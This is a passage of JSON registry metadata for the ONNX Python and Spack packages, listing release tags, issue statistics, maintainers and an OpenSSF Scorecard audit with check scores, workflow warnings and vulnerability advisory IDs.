repositories/onnx%2Fonnx/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.2/manifests"},{"name":"v0.1","sha":"bbe22f447a4f3c38642dc9ca7ba0e8dd1ebaef94","kind":"commit","published_at":"2017-09-07T07:56:59.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v0.1","html_url":"https://github.com/onnx/onnx/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:18:06.641Z","dependent_packages_count":1,"downloads":324682,"downloads_period":"last-month","dependent_repos_count":2,"rankings":{"downloads":3.209884761319273,"dependent_repos_count":11.801525671030856,"dependent_packages_count":7.312883868137378,"stargazers_count":0.12314836931197456,"forks_count":0.10141630413927318,"docker_downloads_count":null,"average":4.509771794787751},"purl":"pkg:pypi/onnx-weekly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/pypi/onnx-weekly","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/pypi/onnx-weekly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/pypi/onnx-weekly/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-28T16:54:51.429Z","issues_count":933,"pull_requests_count":834,"avg_time_to_close_issue":20454176.395948436,"avg_time_to_close_pull_request":7484056.472108844,"issues_closed_count":538,"pull_requests_closed_count":735,"pull_request_authors_count":122,"issue_authors_count":498,"avg_comments_per_issue":3.084673097534834,"avg_comments_per_pull_request":2.241007194244604,"merged_pull_requests_count":575,"bot_issues_count":0,"bot_pull_requests_count":149,"past_year_issues_count":336,"past_year_pull_requests_count":478,"past_year_avg_time_to_close_issue":1613074.5972222222,"past_year_avg_time_to_close_pull_request":604450.2235294117,"past_year_issues_closed_count":144,"past_year_pull_requests_closed_count":425,"past_year_pull_request_authors_count":55,"past_year_issue_authors_count":209,"past_year_avg_comments_per_issue":2.4642857142857144,"past_year_avg_comments_per_pull_request":2.215481171548117,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":114,"past_year_merged_pull_requests_count":355,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/issues","maintainers":[{"login":"andife","count":85,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"jcwchen","count":45,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jcwchen"},{"login":"liqunfu","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"take-cheeze","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"},{"login":"zhenhuaw-me","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"linkerzhang","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/linkerzhang"},{"login":"prasanthpul","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/prasanthpul"},{"login":"houseroad","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/houseroad"},{"login":"jbachurski","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbachurski"},{"login":"lutzroeder","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lutzroeder"},{"login":"philass","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philass"},{"login":"xuzijian629","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xuzijian629"}],"active_maintainers":[{"login":"andife","count":58,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/andife"},{"login":"liqunfu","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/liqunfu"},{"login":"daquexian","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/daquexian"},{"login":"zhenhuaw-me","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/zhenhuaw-me"},{"login":"take-cheeze","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/take-cheeze"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx-weekly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx-weekly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx-weekly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx-weekly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx-weekly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages/onnx-weekly/codemeta","maintainers":[{"uuid":"onnx","login":"onnx","name":null,"email":null,"url":null,"packages_count":4,"html_url":"https://pypi.org/user/onnx/","role":null,"created_at":"2023-02-19T13:33:11.190Z","updated_at":"2023-02-19T13:33:11.190Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/onnx/packages"},{"uuid":"justinchuby","login":"justinchuby","name":null,"email":null,"url":null,"packages_count":12,"html_url":"https://pypi.org/user/justinchuby/","role":null,"created_at":"2024-09-02T00:38:44.569Z","updated_at":"2024-09-02T00:38:44.569Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/justinchuby/packages"},{"uuid":"andife","login":"andife","name":null,"email":null,"url":null,"packages_count":2,"html_url":"https://pypi.org/user/andife/","role":"Owner","created_at":"2024-10-29T22:18:05.214Z","updated_at":"2024-10-29T22:18:05.214Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/andife/packages"},{"uuid":"liqun_foo_at_gmail","login":"liqun_foo_at_gmail","name":null,"email":null,"url":null,"packages_count":2,"html_url":"https://pypi.org/user/liqun_foo_at_gmail/","role":null,"created_at":"2024-09-02T00:38:44.752Z","updated_at":"2024-09-02T00:38:44.752Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers/liqun_foo_at_gmail/packages"}],"registry":{"name":"pypi.org","url":"https://pypi.org","ecosystem":"pypi","default":true,"packages_count":890698,"maintainers_count":381518,"namespaces_count":0,"keywords_count":289179,"github":"pypi","metadata":{"funded_packages_count":54301},"icon_url":"https://github.com/pypi.png","created_at":"2022-04-04T15:19:23.364Z","updated_at":"2026-06-10T05:13:28.296Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/pypi.org/namespaces"}},{"id":75789,"name":"py-onnx","ecosystem":"spack","description":"Open Neural Network Exchange (ONNX) is an open ecosystem that empowers\nAI developers to choose the right tools as their project evolves. ONNX\nprovides an open source format for AI models, both deep learning and\ntraditional ML. It defines an extensible computation graph model, as\nwell as definitions of built-in operators and standard data types.\nCurrently we focus on the capabilities needed for inferencing (scoring).\n","homepage":"https://github.com/onnx/onnx","licenses":"[]","normalized_licenses":["Other"],"repository_url":"https://github.com/onnx/onnx","keywords_array":[],"namespace":null,"versions_count":15,"first_release_published_at":"2022-04-05T09:26:35.945Z","latest_release_published_at":"2025-03-17T21:13:23.557Z","latest_release_number":"1.17.0","last_synced_at":"2026-05-25T18:17:33.090Z","created_at":"2022-04-05T09:26:35.916Z","updated_at":"2026-05-25T18:17:33.090Z","registry_url":"https://packages.spack.io/package.html?name=py-onnx","install_command":"spack install py-onnx","documentation_url":null,"metadata":{},"repo_metadata":{"id":24890799,"uuid":"102692863","full_name":"onnx/onnx","owner":"onnx","description":"Open standard for machine learning interoperability","archived":false,"fork":false,"pushed_at":"2025-10-27T15:22:48.000Z","size":44729,"stargazers_count":19779,"open_issues_count":283,"forks_count":3816,"subscribers_count":426,"default_branch":"main","last_synced_at":"2025-10-27T17:28:08.029Z","etag":null,"topics":["deep-learning","deep-neural-networks","dnn","keras","machine-learning","ml","neural-network","onnx","pytorch","scikit-learn","tensorflow"],"latest_commit_sha":null,"homepage":"https://onnx.ai/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/onnx.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-09-07T04:53:45.000Z","updated_at":"2025-10-27T15:22:58.000Z","dependencies_parsed_at":"2025-04-15T13:18:07.946Z","dependency_job_id":"18eecf52-5a7d-4c8a-88f2-d8c63852c71f","html_url":"https://github.com/onnx/onnx","commit_stats":{"total_commits":2783,"total_committers":358,"mean_commits":7.773743016759776,"dds":0.903701042040963,"last_synced_commit":"f615b26d564ca5d2e2a28af81f4b86a99a1865f1"},"previous_names":[],"tags_count":35,"template":false,"template_full_name":null,"purl":"pkg:github/onnx/onnx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/sbom","scorecard":{"id":245425,"data":{"date":"2025-08-16T10:32:36Z","repo":{"name":"github.com/onnx/onnx","commit":"3e8c39a7c90f06e3a5ea9561c72770649dcb1b4f"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":6.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: Dependabot: .github/dependabot.yml:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":0,"reason":"dangerous workflow patterns detected","details":["Warn: untrusted code checkout '${{ github.event.pull_request.head.sha }}': .github/workflows/auto_update_doc.yml:25"],"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":9,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/auto_update_doc.yml:22","Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:35","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:36","Info: jobLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:26","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:214","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:266","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:304","Info: jobLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:162","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/auto_update_doc.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/check_urls.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/clang_tidy_review.yml:16","Warn: topLevel 'checks' permission set to 'write': .github/workflows/clang_tidy_review_post.yml:16","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:24","Info: topLevel 'contents' permission set to 'read': .github/workflows/copilot-setup-steps.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/create_release.yml:62","Info: topLevel 'contents' permission set to 'read': .github/workflows/dco_merge_group.yml:10","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/pages.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/pixi_build.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr_checks.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/preview_source_dist_test.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_linux.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_mac.yml:23","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_sdist.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_aarch64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/release_win_x86_64.yml:18","Info: topLevel 'contents' permission set to 'read': .github/workflows/reuse.yml:10","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/stale.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/weekly_modelzoo.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/win_no_exception_ci.yml:14"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":5,"reason":"badge detected: Passing","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Info: Possibly incomplete results: error parsing shell code: statements must be separated by \u0026, ; or a newline: .github/workflows/main.yml:131","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/copilot-setup-steps.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/copilot-setup-steps.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pixi_build.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pixi_build.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr_checks.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/pr_checks.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/release_linux.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/onnx/onnx/release_linux.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/auto_update_doc.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:78","Warn: pipCommand not pinned by hash: .github/workflows/codeql.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:39","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:40","Warn: pipCommand not pinned by hash: .github/workflows/copilot-setup-steps.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:73","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:80","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:85","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:86","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:151","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:161","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:171","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:189","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:195","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:249","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:266","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:37","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:38","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/pr_checks.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:49","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:50","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:57","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:82","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:112","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:113","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:119","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:120","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:126","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:46","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:55","Info:  59 out of  61 GitHub-owned GitHubAction dependencies pinned","Info:  22 out of  27 third-party GitHubAction dependencies pinned","Info:   0 out of  49 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/create_release.yml:152"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"74 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-6rq9-53c3-f7vj","Warn: Project is vulnerable to: PYSEC-2023-38 / GHSA-ffxj-547x-5j7c","Warn: Project is vulnerable to: PYSEC-2025-10 / GHSA-h36j-8vv3-cj52","Warn: Project is vulnerable to: PYSEC-2024-223 / GHSA-h8wv-9h96-m4hr","Warn: Project is vulnerable to: PYSEC-2024-222 / GHSA-whh8-fjgc-qp73","Warn: Project is vulnerable to: GHSA-3c5c-7235-994j","Warn: Project is vulnerable to: GHSA-3f63-hfp8-52jq","Warn: Project is vulnerable to: PYSEC-2021-41 / GHSA-3wvg-mj6g-m9cv","Warn: Project is vulnerable to: PYSEC-2020-77 / GHSA-3xv8-3j54-hgrp","Warn: Project is vulnerable to: PYSEC-2020-80 / GHSA-43fq-w8qq-v88h","Warn: Project is vulnerable to: GHSA-44wm-f244-xhp3","Warn: Project is vulnerable to: GHSA-4fx9-vc88-q2xc","Warn: Project is vulnerable to: PYSEC-2021-35 / GHSA-57h3-9rgr-c24m","Warn: Project is vulnerable to: PYSEC-2020-172 / GHSA-5gm3-px64-rw72","Warn: Project is vulnerable to: PYSEC-2021-331 / GHSA-7534-mm45-c74v","Warn: Project is vulnerable to: PYSEC-2021-92 / GHSA-7r7m-5h27-29hp","Warn: Project is vulnerable to: PYSEC-2020-78 / GHSA-8843-m7mw-mxqm","Warn: Project is vulnerable to: PYSEC-2023-227 / GHSA-8ghj-p4vj-mr35","Warn: Project is vulnerable to: PYSEC-2014-87 / GHSA-8m9x-pxwq-j236","Warn: Project is vulnerable to: PYSEC-2022-10 / GHSA-8vj2-vxx3-667w","Warn: Project is vulnerable to: PYSEC-2021-36 / GHSA-8xjq-8fcg-g5hw","Warn: Project is vulnerable to: PYSEC-2016-6 / GHSA-8xjv-v9xq-m5h9","Warn: Project is vulnerable to: PYSEC-2021-42 / GHSA-95q3-8gr9-gm8w","Warn: Project is vulnerable to: PYSEC-2022-168 / GHSA-9j59-75qj-795w","Warn: Project is vulnerable to: PYSEC-2014-10 / GHSA-cfmr-38g9-f2h7","Warn: Project is vulnerable to: PYSEC-2020-76 / GHSA-cqhg-xjhh-p8hf","Warn: Project is vulnerable to: PYSEC-2021-40 / GHSA-f4w8-cv6p-x6r5","Warn: Project is vulnerable to: PYSEC-2021-69 / GHSA-f5g8-5qq7-938w","Warn: Project is vulnerable to: PYSEC-2021-139 / GHSA-g6rj-rv7j-xwp4","Warn: Project is vulnerable to: PYSEC-2015-16 / GHSA-h5rf-vgqx-wjv2","Warn: Project is vulnerable to: PYSEC-2016-5 / GHSA-hggx-3h72-49ww","Warn: Project is vulnerable to: PYSEC-2020-84 / GHSA-hj69-c76v-86wr","Warn: Project is vulnerable to: PYSEC-2016-7 / GHSA-hvr8-466p-75rh","Warn: Project is vulnerable to: PYSEC-2015-15 / GHSA-j6f7-g425-4gmx","Warn: Project is vulnerable to: GHSA-j7hp-h8jx-5ppr","Warn: Project is vulnerable to: PYSEC-2019-110 / GHSA-j7mj-748x-7p78","Warn: Project is vulnerable to: GHSA-jgpv-4h4c-xhw3","Warn: Project is vulnerable to: PYSEC-2022-42979 / GHSA-m2vv-5vj5-2hm7","Warn: Project is vulnerable to: PYSEC-2021-37 / GHSA-mvg9-xffr-p774","Warn: Project is vulnerable to: PYSEC-2020-83 / GHSA-p49h-hjvm-jg3h","Warn: Project is vulnerable to: PYSEC-2022-8 / GHSA-pw3c-h7wp-cvhx","Warn: Project is vulnerable to: PYSEC-2021-93 / GHSA-q5hq-fp76-qmrc","Warn: Project is vulnerable to: PYSEC-2020-82 / GHSA-r7rm-8j6h-r933","Warn: Project is vulnerable to: PYSEC-2014-23 / GHSA-r854-96gq-rfg3","Warn: Project is vulnerable to: PYSEC-2016-8 / GHSA-rwr3-c2q8-gm56","Warn: Project is vulnerable to: PYSEC-2020-81 / GHSA-vcqg-3p29-xw73","Warn: Project is vulnerable to: PYSEC-2020-79 / GHSA-vj42-xq3r-hr3r","Warn: Project is vulnerable to: PYSEC-2021-70 / GHSA-vqcj-wrf2-7v73","Warn: Project is vulnerable to: PYSEC-2016-9 / GHSA-w4vg-rf63-f3j3","Warn: Project is vulnerable to: PYSEC-2014-22 / GHSA-x895-2wrm-hvp7","Warn: Project is vulnerable to: PYSEC-2022-9 / GHSA-xrcv-f9gm-v42c","Warn: Project is vulnerable to: PYSEC-2021-137","Warn: Project is vulnerable to: PYSEC-2021-138","Warn: Project is vulnerable to: PYSEC-2021-317","Warn: Project is vulnerable to: PYSEC-2021-38","Warn: Project is vulnerable to: PYSEC-2021-39","Warn: Project is vulnerable to: PYSEC-2021-94","Warn: Project is vulnerable to: PYSEC-2023-175","Warn: Project is vulnerable to: PYSEC-2018-34 / GHSA-2fc2-6r4j-p65h","Warn: Project is vulnerable to: PYSEC-2021-856 / GHSA-5545-2q6w-2gh6","Warn: Project is vulnerable to: PYSEC-2019-108 / GHSA-9fq2-x9r6-wfmf","Warn: Project is vulnerable to: PYSEC-2018-33 / GHSA-cw6w-4rcx-xphc","Warn: Project is vulnerable to: PYSEC-2021-857 / GHSA-f7c7-j99h-c22f","Warn: Project is vulnerable to: GHSA-fpfv-jqm9-f5jm","Warn: Project is vulnerable to: PYSEC-2017-1 / GHSA-frgw-fgh6-9g52","Warn: Project is vulnerable to: PYSEC-2022-48 / GHSA-77rm-9x9h-xj3g","Warn: Project is vulnerable to: GHSA-8gq9-2x98-w8hf","Warn: Project is vulnerable to: GHSA-8qvm-5x2c-j2w7","Warn: Project is vulnerable to: PYSEC-2017-65 / GHSA-jwvw-v7c5-m82h","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579","Warn: Project is vulnerable to: PYSEC-2022-43017 / GHSA-qwmp-2cf2-g9g6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 30 contributing companies or organizations","details":["Info: found contributions from: EasyRPG, PeachPy, ScottyLabs, ZhaobangChina, amd, anthropics, barnowl, chainer, couler-proj, cpprefjp, cryfs, cupy, dotnet, facebook, ghc, gsoc-cn, intelligent-machine-learning, k9mail, microsoft, microsoft research, mrbgems, nanyang technological university, 